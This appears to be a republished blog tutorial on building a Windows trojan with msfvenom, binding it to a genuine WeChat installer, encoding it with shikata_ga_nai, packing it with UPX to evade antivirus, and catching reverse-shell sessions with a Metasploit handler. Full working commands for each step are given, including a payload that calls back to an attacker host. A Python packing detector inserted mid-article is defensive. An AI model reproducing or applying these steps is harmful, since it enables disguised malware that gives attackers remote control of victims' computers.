How to Bypass Antivirus Detection with Metasploit and UPX: A Step‑by‑Step Guide

This article explains how to create a Windows trojan, host it on a Kali Apache server, test its detection with VirusTotal, apply Metasploit encoding and UPX packing to evade antivirus software, and set up a listener for remote control.

MaGe Linux Operations

"Immune evasion" (免杀) refers to techniques that prevent antivirus or anti‑spyware programs from detecting malicious payloads, often by altering their signatures while preserving functionality.

1. Bare Trojan Attempt

This approach generates a trojan without any evasion processing.

Use msfvenom to create a Windows meterpreter payload named weixin.exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

Deploy Apache on Kali, place weixin.exe in /var/www/html, and let the target download it via http://192.168.111.132/weixin.exe. The file is flagged by AV.

Before delivery, test the file on VirusTotal, a free multi‑engine scanning service.

2. Metasploit Encoding

List available encoders with msfvenom -l encoders and choose a legitimate executable (e.g., the genuine WeChat installer) as a template for binding.

Generate a reverse‑shell trojan, bind it to WeChatSetup.exe, and encode it with x86/shikata_ga_nai twelve times:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe
-e specifies the encoder.
-x specifies the template executable.
-i specifies the number of encoding iterations.
-f specifies the output format.
-o specifies the output path.

Place the resulting file on the Apache server, let the target download it, and start a Metasploit handler:

use exploit/multi/handler
set payload windows/shell/reverse_tcp
set LHOST 192.168.111.132
set LPORT 9999
run

3. UPX Packing

UPX can compress or pack an executable, altering its signature. Use it to pack the previously encoded trojan:

upx /root/WeChatSetup1.exe

Host the packed file on Apache and establish a listener as before; a successful session demonstrates that the payload evaded AV detection.
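From the defender's side, the packing step above leaves recognisable traces: UPX writes its default section names and compressed sections have near-maximal byte entropy. The following checker is an added example, not code from the original article; it parses the PE section table, flags those two indicators, and is exercised on a constructed minimal PE (not a real binary).

```python
import math
import struct

# Default section names written by UPX; renaming them is easy, so entropy is a second signal.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8.0 for compressed/encrypted data, much lower for code."""
    n = len(data)
    return -sum((data.count(b) / n) * math.log2(data.count(b) / n) for b in set(data))

def parse_sections(pe: bytes):
    """Yield (name, raw_offset, raw_size) for each entry in the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]          # e_lfanew
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", pe, pe_off + 6)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, pe_off + 20)[0]  # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size                           # first section header
    for i in range(nsec):
        hdr = pe[table + 40 * i:table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)  # SizeOfRawData, PointerToRawData
        yield name, raw_ptr, raw_size

def packing_indicators(pe: bytes, entropy_threshold: float = 7.0) -> dict:
    """Return the sections that look packed (UPX name or high entropy) as evidence."""
    hits = []
    for name, off, size in parse_sections(pe):
        ent = shannon_entropy(pe[off:off + size])
        if name in PACKER_SECTION_NAMES or ent > entropy_threshold:
            hits.append((name, round(ent, 2)))
    return {"packed": bool(hits), "sections": hits}

def build_pe(sections):
    """Constructed minimal PE for testing only: sections is a list of (name, body bytes)."""
    opt = b"\0" * 16                                         # dummy optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    data_off = 0x40 + 4 + len(coff) + len(opt) + 40 * len(sections)
    headers, bodies = b"", b""
    for name, body in sections:
        headers += struct.pack("<8sIIII", name.encode(), len(body), 0x1000,
                               len(body), data_off + len(bodies)) + b"\0" * 16
        bodies += body
    return b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt + headers + bodies

# Constructed samples: a plain code-like section versus a UPX-style layout.
PLAIN_EXE = build_pe([(".text", b"\x90" * 200 + b"\xc3")])
PACKED_EXE = build_pe([("UPX0", b""), ("UPX1", bytes(range(256)) * 4)])
```

The same two checks are what many triage tools and YARA rules apply to flag packed samples for closer inspection; on real binaries, expect the entropy threshold to need tuning per file type.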

Conclusion

Antivirus vendors continuously develop detection for evasion techniques, so methods that work today may become ineffective later.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
Written by MaGe Linux Operations